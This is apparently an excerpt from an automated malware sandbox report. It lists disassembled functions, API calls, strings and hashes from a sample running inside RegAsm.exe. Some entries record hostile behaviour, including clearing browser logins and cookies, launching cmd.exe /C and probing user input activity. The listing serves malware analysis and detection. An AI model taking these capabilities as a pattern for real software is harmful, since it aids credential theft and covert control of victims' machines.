                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000000,?,00000001,?,?,00000001,?,00467C58), ref: 0044338A
                                                                                              • __alloca_probe_16.LIBCMT ref: 004433C2
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00443413
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00443425
                                                                                              • __freea.LIBCMT ref: 0044342E
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: b8069bea4df690f4247f5c79c8b59d8d37ba95c93cc630931fa5ce21aaaa82fd
                                                                                              • Instruction ID: 613b810780fe4859688c941d2bbeff8913d35e1692fb54097f553fc103df8f50
                                                                                              • Opcode Fuzzy Hash: b8069bea4df690f4247f5c79c8b59d8d37ba95c93cc630931fa5ce21aaaa82fd
                                                                                              • Instruction Fuzzy Hash: 55310E72A0020AABEF259F65DC81DEF7BA5EB01B11F04016AFC14D6290EB39CE50CB94
                                                                                              Function 0044153A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00441543
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00441566
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044158C
                                                                                              • _free.LIBCMT ref: 0044159F
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004415AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: 32190a1f0b239f1f33a60ff9f03c525b00aee971c6ed98019c25e1985d53470b
                                                                                              • Instruction ID: 0b963310433ed909f4298f7bed4582eea210cd486c0a534cbd05f872a17047ef
                                                                                              • Opcode Fuzzy Hash: 32190a1f0b239f1f33a60ff9f03c525b00aee971c6ed98019c25e1985d53470b
                                                                                              • Instruction Fuzzy Hash: 6901D476A126157F332117B75C48CFB6A6CDAC7BA4314016FFE06C2250DA79CD4282B9
                                                                                              Function 00442BCD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00442BE5
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 00442BF7
                                                                                              • _free.LIBCMT ref: 00442C09
                                                                                              • _free.LIBCMT ref: 00442C1B
                                                                                              • _free.LIBCMT ref: 00442C2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
                                                                                              • Instruction ID: 955dd411307ab1f53dee283ea2c46591a2e1c5327ced68c2c30979c1e126fd0a
                                                                                              • Opcode Fuzzy Hash: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
                                                                                              • Instruction Fuzzy Hash: 8DF062328082046BDA20DBA9FAC6D9B73E9EA853107941C1BF514D7740DBB8FCC047AC
                                                                                              Function 00439735 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00439753
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 00439765
                                                                                              • _free.LIBCMT ref: 00439778
                                                                                              • _free.LIBCMT ref: 00439789
                                                                                              • _free.LIBCMT ref: 0043979A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
                                                                                              • Instruction ID: 9ef463557e41da891acb4cd30ea69058f6d3186d2e22c24e8b27c7661cd970de
                                                                                              • Opcode Fuzzy Hash: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
                                                                                              • Instruction Fuzzy Hash: D3F030B4816A51CBCA45BF28BC425553BE0E74E734B10112BF62457371F7B808698FDE
                                                                                              Function 0040D476 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0040D5AC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Enum$InfoQueryValue
                                                                                              • String ID: [regsplt]
                                                                                              • API String ID: 3554306468-4262303796
                                                                                              • Opcode ID: 6005b405a2cb792110072c9926127ff8b649eaa13aa989df7cec55600834420c
                                                                                              • Instruction ID: cec7730470a505a3256cfe8bef0cb683ba61c19b7add015e1d9d78f1a423faa4
                                                                                              • Opcode Fuzzy Hash: 6005b405a2cb792110072c9926127ff8b649eaa13aa989df7cec55600834420c
                                                                                              • Instruction Fuzzy Hash: 90513D71900219AADB11EBE1DC96EEFB77CAF04304F10017AF605B2191EF786B49CB69
                                                                                              Function 004408C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strpbrk.LIBCMT ref: 00440918
                                                                                              • _free.LIBCMT ref: 00440A35
                                                                                                • Part of subcall function 004322E3: IsProcessorFeaturePresent.KERNEL32(00000017,004322B5,00000000,00000000,00467F30,00000000,00000000,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000), ref: 004322E5
                                                                                                • Part of subcall function 004322E3: GetCurrentProcess.KERNEL32(C0000417), ref: 00432307
                                                                                                • Part of subcall function 004322E3: TerminateProcess.KERNEL32(00000000), ref: 0043230E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2812119850-3972193922
                                                                                              • Opcode ID: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
                                                                                              • Instruction ID: 650f7b95baa2f55995b2d66d03bab482663cf2eccb6ced69fa93d6f4d14c5d84
                                                                                              • Opcode Fuzzy Hash: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
                                                                                              • Instruction Fuzzy Hash: C551D371E002099FEF14CFA9C881AAEF7B5EF58314F24416EE644E7301E6399E11CB54
                                                                                              Function 00437E45 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437F9E
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437FB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: ~C$ ~C
                                                                                              • API String ID: 885266447-903778833
                                                                                              • Opcode ID: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
                                                                                              • Instruction ID: 5e0205a4890506e29233cee9db7b7ce387702eeec4fe8001aee1c665518b7736
                                                                                              • Opcode Fuzzy Hash: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
                                                                                              • Instruction Fuzzy Hash: 00519EB1A04149AFCF24CF59C880AAEBBB2FF88364F18919AE85897361D734DD01CB44
                                                                                              Function 00438B03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00438B43
                                                                                              • _free.LIBCMT ref: 00438C0E
                                                                                              • _free.LIBCMT ref: 00438C18
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 2506810119-1068371695
                                                                                              • Opcode ID: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
                                                                                              • Instruction ID: 8871a02dc71d87ae79a0c8c1142e0f43972f8d7c07d3df44b28c0f215ac531c3
                                                                                              • Opcode Fuzzy Hash: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
                                                                                              • Instruction Fuzzy Hash: 8031A0B1A01319ABDB21DB998C8199FFBBCEB89314F1050ABF90497311DA789E44CB59
                                                                                              Function 00401F7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00401F7A), ref: 00401F96
                                                                                              • CloseHandle.KERNEL32(?), ref: 00401FED
                                                                                              • SetEvent.KERNEL32(?), ref: 00401FFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                              • String ID: Connection Timeout
                                                                                              • API String ID: 2055531096-499159329
                                                                                              • Opcode ID: 5f13aaf7b8e59a2c7a2739160739fdd3e591158e1be21158204aeb5131fd54c0
                                                                                              • Instruction ID: 53294a7de4bdb51bce9aa9965701b23816d0540fe960ce4e3515f9f1b139e479
                                                                                              • Opcode Fuzzy Hash: 5f13aaf7b8e59a2c7a2739160739fdd3e591158e1be21158204aeb5131fd54c0
                                                                                              • Instruction Fuzzy Hash: BA012831A44B01AFD7216B768C8582A7BE1BF01305700097FE583526B1D7789400D759
                                                                                              Function 00409FC3 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040A031
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw
                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                              • API String ID: 2005118841-1866435925
                                                                                              • Opcode ID: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
                                                                                              • Instruction ID: cb096aa3a16b0a6b94bda36ceb80c3fc8b27b60b13b52bc6373e390451181ed5
                                                                                              • Opcode Fuzzy Hash: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
                                                                                              • Instruction Fuzzy Hash: FE01DB7164030CAAEB10EA51C853FBA73685B0030AF20802BB906B50C3EA7C6C56862F
                                                                                              Function 0040F7EC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0040F82E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: /C $cmd.exe$open
                                                                                              • API String ID: 587946157-3896048727
                                                                                              • Opcode ID: e9be1cae5e88f28fea9b31ed830316ce0126727f9bca6dcbd1f499a420210de6
                                                                                              • Instruction ID: b9b5919498ba485fb8f6930109a7034d9cba9b0480c4b6652f0920fc7d9d687c
                                                                                              • Opcode Fuzzy Hash: e9be1cae5e88f28fea9b31ed830316ce0126727f9bca6dcbd1f499a420210de6
                                                                                              • Instruction Fuzzy Hash: D7F062311082016AC215FB22D8569BFB7A9ABD1705F00483FB546A20D2EF7C5A4ED61E
                                                                                              Function 0040D0A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,76230F10), ref: 0040D0CE
                                                                                              • RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 0040D0EF
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D0F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: del
                                                                                              • API String ID: 3677997916-3960539263
                                                                                              • Opcode ID: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
                                                                                              • Instruction ID: c18f750833c3ba39f056a91a96db6080338cdd2eaf1d6b7373ff174bee547806
                                                                                              • Opcode Fuzzy Hash: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
                                                                                              • Instruction Fuzzy Hash: 13F0C275A00218FBDB109B90DC06FDD7B7CEB04705F2040A2BA00B6191DBB46E488BDC
                                                                                              Function 004012F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004012FF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                              • API String ID: 1646373207-2714051624
                                                                                              • Opcode ID: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
                                                                                              • Instruction ID: 7a1079c1b55b5e409d7bab262d9c77c56b6c484de43da482ee61ffea879d2a08
                                                                                              • Opcode Fuzzy Hash: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
                                                                                              • Instruction Fuzzy Hash: D6B09BB4D41700D7C7141BF1DC0D54936649505B07B104135F84583191DAB8044E4F1E
                                                                                              Function 0040139A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004013A4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004013AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                              • API String ID: 2574300362-1519888992
                                                                                              • Opcode ID: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
                                                                                              • Instruction ID: 7060e6096a3b0cf119f91b7b5660e64d53dcedb2c7a0492c07f29decda4d72cf
                                                                                              • Opcode Fuzzy Hash: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
                                                                                              • Instruction Fuzzy Hash: 15B09BB8941300D787542FF0AD0D9053A65D505B17F100479F855C3192DA75004D465F
                                                                                              Function 0044A124 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 8ab86d4979cbb6b2f30f53775e67ed672c526299a82329e5a83bd5f816168403
                                                                                              • Instruction ID: 02328b9a0def9105c60072ac53d4c6597c74db7361cec4947c3cfec5fa8f093c
                                                                                              • Opcode Fuzzy Hash: 8ab86d4979cbb6b2f30f53775e67ed672c526299a82329e5a83bd5f816168403
                                                                                              • Instruction Fuzzy Hash: 4B414E31A401006BEB216FBA8C46AAF3664FF8E374F14019BF428D63D1E67D5821566F
                                                                                              Function 004382C1 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
                                                                                              • Instruction ID: 87f12df7f4bff9a267f7e33f5d575456b8aa141ba8f1907d633ac3855509fe08
                                                                                              • Opcode Fuzzy Hash: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
                                                                                              • Instruction Fuzzy Hash: A0412871A00704AFE7249F78CC01BABFBA4EB8C714F10916FF551DB781DA7AA9018788
                                                                                              Function 004084F3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • [Cleared browsers logins and cookies.], xrefs: 004085CB
                                                                                              • Cleared browsers logins and cookies., xrefs: 004085DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                              • API String ID: 3472027048-1236744412
                                                                                              • Opcode ID: fec844d9daa80f8df692030c79d878bcdb8a31ffff570fece2d038f310427063
                                                                                              • Instruction ID: 1367f80d1a5ae34b59ca1da1382871fc212a19866b6e8415878d7c7997fe6198
                                                                                              • Opcode Fuzzy Hash: fec844d9daa80f8df692030c79d878bcdb8a31ffff570fece2d038f310427063
                                                                                              • Instruction Fuzzy Hash: 8431A21464C381BAC61167B51E567AB7B920B93758F09487FE8C42B3C3DDBA4809936F
                                                                                              Function 00439101 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
                                                                                              • Instruction ID: 579b40c2be03176720b1ab7dfba76c3c7b2672f3b9e2c73a2f16070f8600f84a
                                                                                              • Opcode Fuzzy Hash: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
                                                                                              • Instruction Fuzzy Hash: 50018FB26096173EFA211A786CC5F67235DDB493B8F20232AF532652D5DAB88C014269
                                                                                              Function 00439180 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
                                                                                              • Instruction ID: 10b1f3d7627c42508a6416dc4a5d0091a6d6fc87295882acb0a4a0c041449646
                                                                                              • Opcode Fuzzy Hash: 84cd3596bf9b84727abbb8ac317bd9742e37cc1944824ab92f6867873fd2e3e7
                                                                                              • Instruction Fuzzy Hash: 7E01F2B29092133EFB101A786CC9D6B671CDB493B8B20232BF531612D0DEA8CD004168
                                                                                              Function 0043D027 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue), ref: 0043D059
                                                                                              • GetLastError.KERNEL32(?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000,00000364,?,0043C6E6), ref: 0043D065
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043CFCE,00000000,00000000,00000000,00000000,?,0043D2FA,00000006,FlsSetValue,00453058,00453060,00000000), ref: 0043D073
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
                                                                                              • Instruction ID: 5d9f9412c01da8515830be1498c2801d5041f6bd8c42a3f808218046de21a0a4
                                                                                              • Opcode Fuzzy Hash: f98deec6f88989dbb97caf1a032761cc789a0d03a01cb996637bfc0b03a42118
                                                                                              • Instruction Fuzzy Hash: 6201F736E013229BC7254B78BC44A573BB8AF4AF65F200532F91AD7250DB24D803C6EC
                                                                                              Function 004149E0 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A11
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 00414A36
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,004108FA), ref: 00414A44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 3919263394-0
                                                                                              • Opcode ID: a1c38c70fb4fd338211c1080a367328a8c277a06638fbbc8c9009515bbc3758c
                                                                                              • Instruction ID: db7a0aeb4d4afb4a2176950650ac5b06a426b4e70c5552e06deca07cffb9f33f
                                                                                              • Opcode Fuzzy Hash: a1c38c70fb4fd338211c1080a367328a8c277a06638fbbc8c9009515bbc3758c
                                                                                              • Instruction Fuzzy Hash: D101F974A41208BFE7105B61DC85EFF776CEB863A4F10016AFD01A3280C6744E019678
                                                                                              Function 0041227E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
